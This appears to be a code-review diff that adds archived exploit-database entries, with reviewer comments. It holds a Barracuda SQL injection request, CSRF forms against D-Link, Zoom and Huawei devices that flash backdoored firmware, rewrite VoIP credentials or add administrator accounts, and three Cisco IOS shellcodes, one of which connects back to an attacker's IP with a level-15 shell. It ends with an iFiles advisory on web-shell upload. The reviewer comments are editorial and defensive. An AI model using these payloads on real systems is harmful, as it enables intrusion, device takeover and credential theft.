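Review bot: the closing `<script>` calls `document.getElementById(1).submit()` as soon as the page loads, so the first form fires without any click; the impact list at the top should say plainly that all three items are cross-site request forgery against apply.cgi and that the precondition is a victim browser on the LAN with an authenticated router session, because that precondition is what defenders can break (log out of the router UI after use, avoid the default 192.168.1.1 address the forms hard-code, and on the firmware side require a per-session token on apply.cgi). Minor: the impact lines carry typos ("execuiton", "admistration", "byass") and `id=1` is an unquoted numeric id, valid in HTML5 but not HTML 4.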

View file

@ -1,68 +1,68 @@
CVE Number: CVE-2008-1094 CVE Number: CVE-2008-1094
Vulnerability: SQL Injection Vulnerability: SQL Injection
Risk: Medium Risk: Medium
Attack vector: From Remote Attack vector: From Remote
Vulnerability Discovered: 16th June 2008 Vulnerability Discovered: 16th June 2008
Vendor Notified: 16th June 2008 Vendor Notified: 16th June 2008
Advisory Released: 15th December 2008 Advisory Released: 15th December 2008
Abstract Abstract
Barracuda Networks Spam Firewall is vulnerable to various SQL Injection attacks. Barracuda Networks Spam Firewall is vulnerable to various SQL Injection attacks.
When exploited by an authenticated user, the identified vulnerability can lead to When exploited by an authenticated user, the identified vulnerability can lead to
Denial of Service, Database Information Disclosure, etc. Denial of Service, Database Information Disclosure, etc.
Description Description
The index.cgi resource was identified as being susceptible to SQL Injection attacks. The index.cgi resource was identified as being susceptible to SQL Injection attacks.
When filtering user accounts in Users->Account View section, the pattern_x parameter When filtering user accounts in Users->Account View section, the pattern_x parameter
(where x = 0..n) allows inserting arbitrary SQL code once filter_x parameter is set (where x = 0..n) allows inserting arbitrary SQL code once filter_x parameter is set
to search_count_equals value. to search_count_equals value.
/cgi-bin/index.cgi?&user=&password=&et=&auth_type=Local&locale=en_US&realm=&primary_tab=USERS&secondary_tab=per_user_account_view&boolean_0=boolean_and&filter_0=search_count_equals&pattern_0=if(database() like concat(char(99),char(37)),5,0) /cgi-bin/index.cgi?&user=&password=&et=&auth_type=Local&locale=en_US&realm=&primary_tab=USERS&secondary_tab=per_user_account_view&boolean_0=boolean_and&filter_0=search_count_equals&pattern_0=if(database() like concat(char(99),char(37)),5,0)
An attacker can exploit this vulnerability by injecting arbitrary SQL code to be An attacker can exploit this vulnerability by injecting arbitrary SQL code to be
executed as part of the SQL query. executed as part of the SQL query.
Original Advisory: Original Advisory:
http://dcsl.ul.ie/advisories/02.htm http://dcsl.ul.ie/advisories/02.htm
Barracuda Networks Technical Alert Barracuda Networks Technical Alert
http://www.barracudanetworks.com/ns/support/tech_alert.php http://www.barracudanetworks.com/ns/support/tech_alert.php
Affected Versions Affected Versions
Barracuda Spam Firewall (Firmware v3.5.11.020, Model 600) Barracuda Spam Firewall (Firmware v3.5.11.020, Model 600)
Other products/versions might be affected. Other products/versions might be affected.
Mitigation Mitigation
Vendor recommends to the following firmware version Vendor recommends to the following firmware version
Barracuda Spam Firewall (Firmware v3.5.12.001) Barracuda Spam Firewall (Firmware v3.5.12.001)
Alternatively, please contact Barracuda Networks for technical support. Alternatively, please contact Barracuda Networks for technical support.
Credits Credits
Dr. Marian Ventuneac, marian.ventuneac@ul.ie Dr. Marian Ventuneac, marian.ventuneac@ul.ie
Data Communication Security Laboratory, Department of Electronic & Computer Engineering, University of Limerick Data Communication Security Laboratory, Department of Electronic & Computer Engineering, University of Limerick
Disclaimer Disclaimer
Data Communication Security Laboratory releases this information with the vendor acceptance. Data Communication Security Laboratory releases this information with the vendor acceptance.
DCSL is not responsible for any malicious application of the information presented in this advisory. DCSL is not responsible for any malicious application of the information presented in this advisory.
# milw0rm.com [2008-12-16] # milw0rm.com [2008-12-16]
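Review bot: Every line of this hunk is identical on the old and new side even though the header reports 68 lines replaced by 68, so the only difference can be whitespace or line endings; that normalisation should be named in the commit message (or separated from the new advisories) so that real content changes stay reviewable. Since the file is being rewritten anyway, the Mitigation line "Vendor recommends to the following firmware version" has a word missing before "the following" and could be repaired in the same pass.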

View file

@ -1,23 +1,23 @@
D-link VoIP Phone Adapter XSS and XSRF(remote firmware overwrite) D-link VoIP Phone Adapter XSS and XSRF(remote firmware overwrite)
model number: DVG-2001s model number: DVG-2001s
f/w version 1.00.007 f/w version 1.00.007
Better than just remote code execution, you control the firmware. Better than just remote code execution, you control the firmware.
<html> <html>
<form action="http://10.1.1.166/Forms/cbi_Set_SW_Update?16640,0,0,0,0,0,0,0,0" <form action="http://10.1.1.166/Forms/cbi_Set_SW_Update?16640,0,0,0,0,0,0,0,0"
method="POST"> method="POST">
<input name="page_HiddenVar" value="0"> <input name="page_HiddenVar" value="0">
<input name="TFTPServerAddress1" value="10"> <input name="TFTPServerAddress1" value="10">
<input name="TFTPServerAddress2" value="1"> <input name="TFTPServerAddress2" value="1">
<input name="TFTPServerAddress3" value="1"> <input name="TFTPServerAddress3" value="1">
<input name="TFTPServerAddress4" value="1"> <input name="TFTPServerAddress4" value="1">
<input name="FirmwareUpdate" value="enabled"> <input name="FirmwareUpdate" value="enabled">
<input name="FileName" value="backdoored_firmware.img"> <input name="FileName" value="backdoored_firmware.img">
<input type=submit value="attack"> <input type=submit value="attack">
</form> </form>
</html> </html>
and xss which can be used for csrf bypass: and xss which can be used for csrf bypass:
http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscript%3Ealert(%22hacked%22)%3C/script%3E http://10.1.1.166/Forms/page_CfgDevInfo_Set?%3Cscript%3Ealert(%22hacked%22)%3C/script%3E
# milw0rm.com [2009-01-29] # milw0rm.com [2009-01-29]
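Review bot: This entry carries no author, discovery date or vendor-notification line; the only provenance is the milw0rm footer, unlike the CVE advisory above it. The form itself shows the root cause a reader needs: the firmware-update handler accepts a plain POST with no anti-CSRF token and no re-authentication, so the fix is a per-session token plus a confirmation step on that form, and a one-line statement of that would make the file useful to defenders rather than only a PoC.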

View file

@ -1,25 +1,25 @@
Written By Michael Brooks Written By Michael Brooks
Special thanks to str0ke! Special thanks to str0ke!
Zoom VoIP Phone Adapater ATA1+1 XSRF Zoom VoIP Phone Adapater ATA1+1 XSRF
voip provider change xsrf voip provider change xsrf
version 1.2.5 version 1.2.5
<html> <html>
<form action="http://10.1.1.165/callwzd.html" method=post> <form action="http://10.1.1.165/callwzd.html" method=post>
<input name=DIRTY_PAGE value=3> <input name=DIRTY_PAGE value=3>
<input name=HELP_PAGE value=html.html> <input name=HELP_PAGE value=html.html>
<input name=_voip_provider_1___provider_type value=1> <input name=_voip_provider_1___provider_type value=1>
<input name=_voip_provider_1___provider_name value=hacked_again> <input name=_voip_provider_1___provider_name value=hacked_again>
<input name=_voip_provider_1___display_name value=hacked_again> <input name=_voip_provider_1___display_name value=hacked_again>
<input name=_voip_provider_1___user_name value=hacked_again> <input name=_voip_provider_1___user_name value=hacked_again>
<input name=_voip_provider_1___auth_user_name value=hacked_again> <input name=_voip_provider_1___auth_user_name value=hacked_again>
<input name=_voip_provider_1___auth_user_password value=hacked_again> <input name=_voip_provider_1___auth_user_password value=hacked_again>
<input name=ipbx_fxo_local_areacode value=hacked_again> <input name=ipbx_fxo_local_areacode value=hacked_again>
<input name=ipbx_fxo_autodial_local_areacode value=hacked_again> <input name=ipbx_fxo_autodial_local_areacode value=hacked_again>
<input name=ipbx_fxo_autodial_digit_leng value=6> <input name=ipbx_fxo_autodial_digit_leng value=6>
<input name=BUTTON_FLASH value="Save+These+Settings"> <input name=BUTTON_FLASH value="Save+These+Settings">
<input type=submit> <input type=submit>
</form> </form>
</html> </html>
# milw0rm.com [2009-01-29] # milw0rm.com [2009-01-29]
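Review bot: Typo in the title line, "Adapater" should be "Adapter"; as with the D-Link entry, there is no discovery date or vendor contact recorded, only the milw0rm footer. The form also shows that the provider credentials (the auth_user_name and auth_user_password fields) are writable by an unauthenticated cross-site POST, which is the point worth stating explicitly in the description.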

View file

@ -1,37 +1,37 @@
Description: Description:
Huawei MT880 is a device offered by the algerian telecom operator - Huawei MT880 is a device offered by the algerian telecom operator -
FAWRI, to provide ADSL Internet connexion and it's already widely in use. FAWRI, to provide ADSL Internet connexion and it's already widely in use.
Overview: Overview:
Huawei MT880 firmware and its default configuration has flaws, which Huawei MT880 firmware and its default configuration has flaws, which
allows LAN users to gain unauthorized full access to device. allows LAN users to gain unauthorized full access to device.
Here are just limited PoCs. Here are just limited PoCs.
Default credentials on the web-based management interface: Default credentials on the web-based management interface:
admin/admin admin/admin
Possible XSRFs: Possible XSRFs:
Adding an administrator user: Adding an administrator user:
http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70 http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70
Disabling firewall/anti-DoS... features: Disabling firewall/anti-DoS... features:
http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70 http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70
Adding a MAC address to the whitelist: Adding a MAC address to the whitelist:
http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104 http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104
Adding an IP address allowed by the firewall: Adding an IP address allowed by the firewall:
http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7 http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7
Over flaws are not covered in this advisory. Over flaws are not covered in this advisory.
Cheers Cheers
/JA /JA
# milw0rm.com [2009-08-24] # milw0rm.com [2009-08-24]
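Review bot: "Over flaws are not covered" should read "Other flaws are not covered". More substantively, every PoC URL embeds admin:admin in the authority part, so the requests only work while the default credentials listed in the Overview remain unchanged; the write-up should say that changing the default password removes that precondition, and it should record the firmware version tested, which the other advisories in this commit do.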

View file

@ -1,135 +1,135 @@
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
# #
# Cisco IOS Connectback shellcode v1.0 # Cisco IOS Connectback shellcode v1.0
# (c) 2007 IRM Plc # (c) 2007 IRM Plc
# By Gyan Chawdhary # By Gyan Chawdhary
# #
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
# #
# The code creates a new TTY, allocates a shell with privilege level 15 and connects back # The code creates a new TTY, allocates a shell with privilege level 15 and connects back
# on port 21 # on port 21
# #
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. # This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# #
# #
# The following five hard-coded addresses must be located for the target IOS version. # The following five hard-coded addresses must be located for the target IOS version.
# #
# The hard-coded addresses used here are for: # The hard-coded addresses used here are for:
# #
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) # IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
# #
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
.equ malloc, 0x804785CC .equ malloc, 0x804785CC
.equ allocate_tty, 0x803d155c .equ allocate_tty, 0x803d155c
.equ ret, 0x804a42e8 .equ ret, 0x804a42e8
.equ addr, 0x803c4ad8 .equ addr, 0x803c4ad8
.equ str, 0x81e270b4 .equ str, 0x81e270b4
.equ tcp_connect, 0x80567568 .equ tcp_connect, 0x80567568
.equ tcp_execute_command, 0x8056c354 .equ tcp_execute_command, 0x8056c354
.equ login, 0x8359b1f4 .equ login, 0x8359b1f4
.equ god, 0xff100000 .equ god, 0xff100000
.equ priv, 0x8359be64 .equ priv, 0x8359be64
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
main: main:
stwu 1,-48(1) stwu 1,-48(1)
mflr 0 mflr 0
stw 31,44(1) stw 31,44(1)
stw 0,52(1) stw 0,52(1)
mr 31,1 mr 31,1
li 3,512 li 3,512
lis 9,malloc@ha #malloc() memory for tcp structure lis 9,malloc@ha #malloc() memory for tcp structure
la 9,malloc@l(9) la 9,malloc@l(9)
mtctr 9 mtctr 9
bctrl bctrl
mr 0,3 mr 0,3
stw 0,20(31) stw 0,20(31)
lwz 9,12(31) lwz 9,12(31)
li 0,1 li 0,1
stb 0,0(9) stb 0,0(9)
lwz 9,12(31) lwz 9,12(31)
lis 0,0xac1e # connect back ip address lis 0,0xac1e # connect back ip address
ori 0,0,1018 # ori 0,0,1018 #
stw 0,4(9) stw 0,4(9)
li 3,66 li 3,66
li 4,0 li 4,0
lis 9,allocate_tty@ha # allocate new TTY lis 9,allocate_tty@ha # allocate new TTY
la 9,allocate_tty@l(9) la 9,allocate_tty@l(9)
mtctr 9 mtctr 9
bctrl bctrl
addi 0,31,24 addi 0,31,24
# Fix TTY structure to enable level 15 shell without password # Fix TTY structure to enable level 15 shell without password
# #
# #
########################################################## ##########################################################
# login patch begin # login patch begin
lis 9, login@ha lis 9, login@ha
la 9, login@l(9) la 9, login@l(9)
li 8,0 li 8,0
stw 8, 0(9) stw 8, 0(9)
# login patch end # login patch end
#IDA placeholder for con0 #IDA placeholder for con0
# #
# lis %r9, ((stdio+0x10000)@h) # lis %r9, ((stdio+0x10000)@h)
# lwz %r9, stdio@l(%r9) # lwz %r9, stdio@l(%r9)
# lwz %r0, 0xDE4(%r9) #priv struct # lwz %r0, 0xDE4(%r9) #priv struct
# #
# priv patch begin # priv patch begin
lis 9, priv@ha lis 9, priv@ha
la 9, priv@l(9) la 9, priv@l(9)
lis 8, god@ha lis 8, god@ha
la 8, god@l(8) la 8, god@l(8)
stw 8, 0(9) stw 8, 0(9)
# priv patch end # priv patch end
########################################################### ###########################################################
li 3,0 li 3,0
li 4,21 # Port 21 for connectback li 4,21 # Port 21 for connectback
lwz 5,12(31) lwz 5,12(31)
li 6,0 li 6,0
li 7,0 li 7,0
mr 8,0 mr 8,0
li 9,0 li 9,0
lis 11,tcp_connect@ha # Connect to attacker IP lis 11,tcp_connect@ha # Connect to attacker IP
la 11,tcp_connect@l(11) la 11,tcp_connect@l(11)
mtctr 11 mtctr 11
bctrl bctrl
mr 0,3 mr 0,3
stw 0,20(31) stw 0,20(31)
li 3,66 li 3,66
lwz 4,20(31) lwz 4,20(31)
li 5,0 li 5,0
li 6,0 li 6,0
li 7,0 li 7,0
li 8,0 li 8,0
li 9,0 li 9,0
li 10,0 li 10,0
lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash
la 11,tcp_execute_command@l(11) la 11,tcp_execute_command@l(11)
mtctr 11 mtctr 11
bctrl bctrl
lwz 11,0(1) lwz 11,0(1)
lwz 0,4(11) lwz 0,4(11)
mtlr 0 mtlr 0
lwz 31,-4(11) lwz 31,-4(11)
mr 1,11 mr 1,11
########################################### ###########################################
lis 9, addr@ha lis 9, addr@ha
addi 0, 9, addr@l addi 0, 9, addr@l
mtctr 0 mtctr 0
xor 3,3,3 xor 3,3,3
addi 3,0, -2 addi 3,0, -2
lis 10, str@ha lis 10, str@ha
addi 4, 10, str@l addi 4, 10, str@l
bctrl bctrl
lis 10, ret@ha lis 10, ret@ha
addi 4, 10, ret@l addi 4, 10, ret@l
mtctr 4 mtctr 4
bctrl bctrl
# milw0rm.com [2008-08-13] # milw0rm.com [2008-08-13]
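Review bot: The header says "The following five hard-coded addresses must be located", but the .equ block defines nine addresses (malloc, allocate_tty, ret, addr, str, tcp_connect, tcp_execute_command, login, priv) plus the god constant; the comment should match the list, or name which of them are version-specific. Minor style: malloc is written in upper-case hex (0x804785CC) while every other address is lower-case, and the "ori 0,0,1018 #" line has an empty comment where the second half of the connect-back address is being documented.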

View file

@ -1,65 +1,65 @@
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
# #
# Cisco IOS Bind shellcode v1.0 # Cisco IOS Bind shellcode v1.0
# (c) 2007 IRM Plc # (c) 2007 IRM Plc
# By Varun Uppal # By Varun Uppal
# #
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
# #
# The code creates a new VTY, allocates a password then sets the privilege level to 15 # The code creates a new VTY, allocates a password then sets the privilege level to 15
# #
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. # This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# Once assembled, the payload is only 116 bytes in length # Once assembled, the payload is only 116 bytes in length
# #
# The following four hard-coded addresses must be located for the target IOS version. # The following four hard-coded addresses must be located for the target IOS version.
# Version 1.1 of the shellcode will auto-locate these values and make the code # Version 1.1 of the shellcode will auto-locate these values and make the code
# IOS-version-independent # IOS-version-independent
# #
# The hard-coded addresses used here are for: # The hard-coded addresses used here are for:
# #
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) # IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
# #
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
.equ makenewvty, 0x803d0d08 .equ makenewvty, 0x803d0d08
.equ malloc, 0x804785cc .equ malloc, 0x804785cc
.equ setpwonline, 0x803b9e90 .equ setpwonline, 0x803b9e90
.equ linesstruct, 0x82f9e334 .equ linesstruct, 0x82f9e334
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
.equ priv, 0xf1000000 #value used to set the privilege level .equ priv, 0xf1000000 #value used to set the privilege level
main: li 3,71 #new vty line = 71 main: li 3,71 #new vty line = 71
lis 9,makenewvty@ha lis 9,makenewvty@ha
la 9,makenewvty@l(9) la 9,makenewvty@l(9)
mtctr 9 mtctr 9
bctrl #makenewvty() bctrl #makenewvty()
li 3,0x1e5c li 3,0x1e5c
lis 9,malloc@ha lis 9,malloc@ha
la 9,malloc@l(9) la 9,malloc@l(9)
mtctr 9 mtctr 9
bctrl #malloc() memory for structure bctrl #malloc() memory for structure
li 4,70 li 4,70
stw 4,0xa68(3) stw 4,0xa68(3)
li 5,72 li 5,72
stw 5,0xa6c(3) stw 5,0xa6c(3)
li 4,0x00 li 4,0x00
bl setp #pointer to the password into LR bl setp #pointer to the password into LR
.string "1rmp455" #the password for the line .string "1rmp455" #the password for the line
setp: mflr 5 setp: mflr 5
lis 9,setpwonline@ha lis 9,setpwonline@ha
la 9,setpwonline@l(9) la 9,setpwonline@l(9)
mtctr 9 mtctr 9
bctrl #setpwonline() bctrl #setpwonline()
lis 8,linesstruct@ha lis 8,linesstruct@ha
la 8,linesstruct@l(8) la 8,linesstruct@l(8)
lwz 9,0(8) lwz 9,0(8)
lis 7,priv@ha lis 7,priv@ha
la 7,priv@l(7) la 7,priv@l(7)
stw 7,0xde4(9) #set privilege level to 15 stw 7,0xde4(9) #set privilege level to 15
# milw0rm.com [2008-08-13] # milw0rm.com [2008-08-13]
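Review bot: The header promises that "Version 1.1 of the shellcode will auto-locate these values", but no such file is part of this commit, so the forward reference dangles and should be dropped or rewritten as a known limitation. Worth noting for detection: the VTY line number (li 3,71) and the password literal in .string "1rmp455" are fixed constants, so this payload is recognisable by those bytes in memory or captures.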

View file

@ -1,50 +1,50 @@
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
# #
# Cisco IOS Tiny shellcode v1.0 # Cisco IOS Tiny shellcode v1.0
# (c) 2007 IRM Plc # (c) 2007 IRM Plc
# By Gyan Chawdhary # By Gyan Chawdhary
# #
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
# #
# The code creates a new TTY, and sets the privilege level to 15 without a password # The code creates a new TTY, and sets the privilege level to 15 without a password
# #
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. # This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# #
# #
# The following two hard-coded addresses must be located for the target IOS version. # The following two hard-coded addresses must be located for the target IOS version.
# #
# The hard-coded addresses used here are for: # The hard-coded addresses used here are for:
# #
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) # IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
# #
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
.equ ret, 0x804a42e8 .equ ret, 0x804a42e8
.equ login, 0x8359b1f4 .equ login, 0x8359b1f4
.equ god, 0xff100000 .equ god, 0xff100000
.equ priv, 0x8359be64 .equ priv, 0x8359be64
# ---------------------------------------------------------------------------------------- # ----------------------------------------------------------------------------------------
main: main:
# login patch begin # login patch begin
lis 9, login@ha lis 9, login@ha
la 9, login@l(9) la 9, login@l(9)
li 8,0 li 8,0
stw 8, 0(9) stw 8, 0(9)
# login patch end # login patch end
# priv patch begin # priv patch begin
lis 9, priv@ha lis 9, priv@ha
la 9, priv@l(9) la 9, priv@l(9)
lis 8, god@ha lis 8, god@ha
la 8, god@l(8) la 8, god@l(8)
stw 8, 0(9) stw 8, 0(9)
# priv patch end # priv patch end
# exit code # exit code
lis 10, ret@ha lis 10, ret@ha
addi 4, 10, ret@l addi 4, 10, ret@l
mtctr 4 mtctr 4
bctrl bctrl
# milw0rm.com [2008-08-13] # milw0rm.com [2008-08-13]
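Review bot: Same mismatch as the connect-back variant: the header says "The following two hard-coded addresses must be located", but three addresses are defined (ret, login, priv) alongside the god constant. Since the login and priv patches are the entire effect of this payload, the comment should list exactly those two as the version-specific values and identify ret separately as the return target.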

View file

@ -0,0 +1,271 @@
Document Title:
===============
Imagam iFiles v1.16.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1160
Release Date:
=============
2013-12-03
Vulnerability Laboratory ID (VL-ID):
====================================
1160
Common Vulnerability Scoring System:
====================================
8.9
Product & Service Introduction:
===============================
iFiles is the most intuitive file manager for iOS with features like connectivity to many file cloud services,
transferring files between computer or cloud services, ability to view many file formats (PDF viewer now
supports annotations, search and more), voice recorder, web downloader, text file editor and more.
Supported Online Cloud Services and Protocols: Dropbox, Google Drive, iCloud, Box.net, SkyDrive, SugarSync, AFP
(Mac Shares), FTP/FTPS, SFTP, Flickr, Picasa, Facebook, Rackspace CloudFiles, CloudApp, PogoPlug, WebDav, Amazon
S3, Ubuntu One Files, ownCloud, 4Shared, also using Amazon S3: DreamObjects and UltiCloud.
( Copy of the Homepage: https://itunes.apple.com/de/app/ifiles/id336683524 & http://imagam.com )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Imagam iFiles v1.16.0 mobile application for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-03: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Imagam
Product: iFiles - Mobile Application iOS 1.16.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
A file include- & arbitrary file upload web vulnerability has been discovered in the official Imagam iFiles v1.16.0 mobile application for apple iOS.
An arbitrary file upload issue allows a remote attacker to upload files with multiple extensions to bypass the validation for unauthorized access.
A file include web vulnerability allows a remote attacker to unauthorized include local web-server file requests or external file requests.
The vulnerability is located in the vulnerable file- and folder-name value. Remote attackers can include local file requests combined with script code
to successful exploit the issue. To include to the vulnerable foldername value it is required to manipulate the `create folder` (add) input (POST Method).
The secound possibility to inject is the vulnerable filename value of the misconfigured (POST Method) upload module. After the include the remote attacker
can access the included file by requesting the regular index or sub category folder (web interface) site.
The arbitrary file upload vulnerability is located in the vulnerable filename value of the upload module. Attackers are also able to upload a php or js
web-shells by renaming the file with multiple extensions. The attacker uploads for example a web-shell with the following name and extension
test.jpg.html.js.php.gif.jpg . After the upload the attacker opens the file in the web application to delete the .gif.jpg file extension to access the
resource with elevated execution access rights.
Exploitation of the file include & arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] File Upload
Vulnerable Parameter(s):
[+] filename (value) - (multiple extensions)
[+] foldername
Affected Module(s):
[+] File & Folder Dir Listing (http://localhost:8080)
1.2
2 local command/path injection web vulnerabilities has been discovered in the official Imagam iFiles v1.16.0 mobile application for apple iOS.
The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the in the device name value of the file dir und sub category listing module. Local attackers are able to inject
own malicious system specific commands or path values requests as the iOS device name. The execute of the injected script code occurs in two
different section with persistent attack vector. The first section is the wifi app web-interface index file/folder dir listing. The secound
execute occurs in the file/folder sub category listing. The security risk of the local command/path inject vulnerability is estimated as high(-)
with a cvss (common vulnerability scoring system) count of 6.2(+)|(-)6.3.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execute of system specific commands or unauthorized path requests.
Request Method(s):
[+] POST to GET
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index- File Dir Listing
[+] Sub Folder/Category - File Dir Listing
Proof of Concept (PoC):
=======================
1.1
The file include and arbitrary file upload web vulnerability can be exploited by remote attackers without privileged web application
user account and also without user interaction. For security demonstration or to reproduce the vulnerability follow the provided
information and steps below.
PoC: foldername
<div id="headerHighlight">
<div id="header">
<div class="logo">
<img src="_device%20folder&path-issue-1_files/icon57.png" alt="icon57" height="57" width="57">
<h1>iFiles</h1>
</div>
<div class="deviceName">
<h4>device bkm337? </h4>
</div>
<div class="urlDiv">
<div class="outer">
<div class="inner">
<b>/>"<[FILE INCLUDE WEB VULNERABILITY!]%22"_device%20folder&[FILE INCLUDE WEB VULNERABILITY!]%22">x.com/</b>
</div>
</div>
</div>
</div>
</div>
</div>
PoC: filename (value)
<tr id="sfile0" url="/" filename="<EMBED SRC=" data:image"="">
<td class="fileName">
<a href="http://192.168.2.106:8080/%3CEMBED%20SRC=" data:image"=""><img class="fileIcon"
src="_device%20folder&path-issue-2_files/FolderIcon.png" alt="*">
<embed src="data:image%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%09%3C/
a%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%3C/td%3E%0A%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%09%09%09%3Ctd%20class=" filelastmod"="">Mon, 02 Dec 2013 15:50:10 GMT</a></td>
<td class="fileSize" align="right">--
<img style="display:none;" class="downloadIcon" src="_device%20folder&path-issue-2_files/downloadIcon.png"
alt="d" onclick="downloadFile('/<EMBED SRC=" data:image');"="">
<img class="deleteIcon" src="_device%20folder&path-issue-2_files/deleteIcon.png" alt="x"
title="Delete this file" onclick="deleteFile('#sfile0');" ="cursor:pointer;"="">
</td>
</tr>
<tr id="sfile1" url="/" filename="[FILE INCLUDE WEB VULNERABILITY!]%22">
<td class="fileName">
<a href="http://192.168.2.106:8080/%3E" <[FILE INCLUDE WEB VULNERABILITY!]%22"><img class="fileIcon"
src="_device%20folder&path-issue-2_files/FolderIcon.png" alt="*">
>"<[FILE INCLUDE WEB VULNERABILITY!]="_device%20folder&path-issue-2_files/a.htm" <="" a="">
</td>
1.2
The local command inject web vulnerability can be exploited by remote attackers with low privileged or restricted iOS device user account
and no user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC: devicename
<div id="headerHighlight">
<div id="header">
<div class="logo">
<img src="device%20name__files/icon57.png" alt="icon57" height="57" width="57">
<h1>iFiles</h1>
</div>
<div class="deviceName">
<h4>d4vice><..[COMMAND/PATH INJECT VULNERABILITY!] </h4>
</div>
<div class="urlDiv">
<div class="outer">
<div class="inner">
<b>/</b>
</div>
</div>
</div>
</div>
</div>
Solution - Fix & Patch:
=======================
1.1
The file include vulnerability and arbitrary file upload vulnerability can be patched by a secure parse and encode of the vulnerable
filename and foldername values.
Encode also the vulnerable path sub category file dir listing and the index file dir listing. Recognize the path value.
1.2
To patch the local command inject web vulnerability it is required to encode the deviename value in the index and sub category sites
to prevent injects or requests.
Security Risk:
==============
1.1
